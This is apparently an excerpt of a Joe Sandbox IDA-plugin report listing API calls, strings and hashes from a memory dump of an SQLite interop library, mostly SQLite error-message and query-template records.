                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC55A1E
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC55A14
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d._memset
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 3064812586-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 848e5f85764b6248f9aa9a2ab0326abb06c988a074edbbf82b38ee5625ec4418
                                                                                                                                                                                                                                      • Instruction ID: e865b2924ba537f5e1212d2e0e95d4c5cfb1fc786f33b6718539f662c81b15fc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 848e5f85764b6248f9aa9a2ab0326abb06c988a074edbbf82b38ee5625ec4418
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8221F677B1021667D7009EACDC81AFE7379EB94314F040179DA54AB345FB39AA2287A1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(SELECT * FROM "%w"."%w" WHERE NOT EXISTS ( SELECT 1 FROM "%w"."%w" WHERE %s),00000000,?,?,?,00000000,?,?,00000000,?,6BCE219E,00000012,?,?,?,?), ref: 6BCDE9A9
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?), ref: 6BCDE9EE
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?,?,?), ref: 6BCDEA10
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BCDEA29
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • SELECT * FROM "%w"."%w" WHERE NOT EXISTS ( SELECT 1 FROM "%w"."%w" WHERE %s), xrefs: 6BCDE9A4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Ia364946505687432.$Iaa0f8e0c251cfd1d.Idb45e174afb28e2c.
                                                                                                                                                                                                                                      • String ID: SELECT * FROM "%w"."%w" WHERE NOT EXISTS ( SELECT 1 FROM "%w"."%w" WHERE %s)
                                                                                                                                                                                                                                      • API String ID: 1407660740-1508026296
                                                                                                                                                                                                                                      • Opcode ID: 2a1399356c48950d3dabfcf62d12f810c13c342f516b20762f94c79edacf5eec
                                                                                                                                                                                                                                      • Instruction ID: 6b55875d42f5dc58740ac583514e4b867bcb846631744a379c6b474d74821e7c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a1399356c48950d3dabfcf62d12f810c13c342f516b20762f94c79edacf5eec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC1186F5A211156BDB00DB98AC81FABB3ACDB05268F1441A1FD08DB241F779EE1087E2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B645,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC56FB1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC56FAA
                                                                                                                                                                                                                                      • SQLITE_, xrefs: 6BC56FC0
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC56F9B
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC56FA5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$SQLITE_$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-947822902
                                                                                                                                                                                                                                      • Opcode ID: 9f877be84508fc3ca7fb4d739720b6644475463ce0a7386831783f237ae7fe85
                                                                                                                                                                                                                                      • Instruction ID: a3bbe6c949c7380efa851dbf039e9264994800a77725a4aaf0353a182cfaf445
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f877be84508fc3ca7fb4d739720b6644475463ce0a7386831783f237ae7fe85
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 731136B3E2922427D7105AA9AC44B877BA88F407B8F0401B2FD48DB242F25DDA6582E4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000079EB,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000001,00000000), ref: 6BC56714
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC5670D
                                                                                                                                                                                                                                      • 2, xrefs: 6BC566D7
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC566FE
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC56708
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-554099259
                                                                                                                                                                                                                                      • Opcode ID: 866eb643581784d51243fbbbd546e6a3e9d82e50db1e09ac9078d38a711a4836
                                                                                                                                                                                                                                      • Instruction ID: b432887085a20ec7b603aa37561a8d552294129d103586f682534a842838a6b1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 866eb643581784d51243fbbbd546e6a3e9d82e50db1e09ac9078d38a711a4836
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7911607151C3449FC300DF68C88285BBBE8BB89758F044A6DE5D99B241EB38D7188B97
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5CA0B
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5CA56
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 9bfdd368023edef4c2e965d2ef78a5195c49b3cb384a14f174150620647ce1c1
                                                                                                                                                                                                                                      • Instruction ID: 1122986e6d7847bca06ed1dc538134d426d03c5c1d2b8f037680ce353107bd47
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9bfdd368023edef4c2e965d2ef78a5195c49b3cb384a14f174150620647ce1c1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4401C473B2161567D6009B699D06D07BB54EF81A78B044065EA19FF301FB28EA3146EA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5C96B
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5C9B6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: bf4bff25611108d1a15db15a4ed94c0fd50ee9ef627e0326b6beafa74ad7b8b7
                                                                                                                                                                                                                                      • Instruction ID: ac6d9ab81ec1a8bcceb7ee39dde455a84bf0bb8d0a8e454f35af69eb6e08a1d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf4bff25611108d1a15db15a4ed94c0fd50ee9ef627e0326b6beafa74ad7b8b7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0601D673B516116797005F799D06907B764EF41B787040065FA29FF301FB28EA3146EA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000079EB,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000), ref: 6BC56661
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC5665A
                                                                                                                                                                                                                                      • 2, xrefs: 6BC56624
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5664B
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC56655
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-554099259
                                                                                                                                                                                                                                      • Opcode ID: d91c8a2f29c14d3975fc20f8dc8f45a543874b708a56e88fc79fb79fea6c6607
                                                                                                                                                                                                                                      • Instruction ID: 17066471c26035d797cd2fe869800717bdd120ff57f827561b95d6e13a90a85e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d91c8a2f29c14d3975fc20f8dc8f45a543874b708a56e88fc79fb79fea6c6607
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 741130715183449FC700DF68C89285BBBE4BB89718F444A6DE4999B241EB38D718CB97
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000247EF,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,?,6BCED4B1,00000000), ref: 6BCED08C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • fts5vocab, xrefs: 6BCED03C
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BCED085
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCED076
                                                                                                                                                                                                                                      • misuse, xrefs: 6BCED080
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$fts5vocab$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-3992595464
                                                                                                                                                                                                                                      • Opcode ID: e65f94bec5331d6b75eb1ee10d4200fed7543656592350bcea58fff79093ce9c
                                                                                                                                                                                                                                      • Instruction ID: 8ab27d0664584fc7a003f78f33934ce141f88ce3c10da14869d64e326ac6938e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e65f94bec5331d6b75eb1ee10d4200fed7543656592350bcea58fff79093ce9c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7601DBB1B5161467EA106679AC06F473B589FC1669F040074FA0DEF241FA2CF71643B5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI25d73a5ab4d6cacb.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BC4C95D
                                                                                                                                                                                                                                      • SI558bdfe0e27562ea.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BC4C9AF
                                                                                                                                                                                                                                      • SI25ca8d2baaee0750.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?), ref: 6BC4CA32
                                                                                                                                                                                                                                      • SI30455e90830ca460.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BC4CA61
                                                                                                                                                                                                                                      • SI8259474343588db4.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BC4CA70
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I25ca8d2baaee0750.I25d73a5ab4d6cacb.I30455e90830ca460.I558bdfe0e27562ea.I8259474343588db4.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1749639562-0
                                                                                                                                                                                                                                      • Opcode ID: fb57f826a62f55f2a3544dbccb90273273129eab29cde45fd7409279caa571f6
                                                                                                                                                                                                                                      • Instruction ID: be5f2dc662a4701a219e6d3b52715c2c7bc3513adeb7539b6c5f661b488a8db0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb57f826a62f55f2a3544dbccb90273273129eab29cde45fd7409279caa571f6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E516DB5A19201AFD710DE25CC81B6BBBB8FB85354F048559F85883310F739EB58CBA2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP(?), ref: 6BC49D3B
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP(00000000), ref: 6BC49D7C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I8b0d9e6837e61abc.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3274833830-0
                                                                                                                                                                                                                                      • Opcode ID: 205568aeb01f09b1378ff3c83c23812c2a764450f0524cc95d41f02400b08718
                                                                                                                                                                                                                                      • Instruction ID: 870bb40f05a279b93e528a3826d51d7f5aa4460b3fedca91b05dea19ad690c7c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 205568aeb01f09b1378ff3c83c23812c2a764450f0524cc95d41f02400b08718
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C341E0B1A246219FE7048F65DA81B26B3B8BF45708F0441A9D8558B243F7BCEB51CBE1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC3B597
                                                                                                                                                                                                                                      • SIb50fc3839c421869.SQLITE.INTEROP(?,?,?,?,?,?,?), ref: 6BC3B5B6
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC3B61A
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC3B633
                                                                                                                                                                                                                                      • SIb50fc3839c421869.SQLITE.INTEROP(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 6BC3B648
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Ib50fc3839c421869.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1529703188-0
                                                                                                                                                                                                                                      • Opcode ID: f744999bb2c0d4923195223302d284b191c98e6ac0a2b0ddd576c3c6612d94bb
                                                                                                                                                                                                                                      • Instruction ID: eb48fca6f0ce16c9521793ac183ccc111f0cf894265655aaeb8e12fd4fb9598b
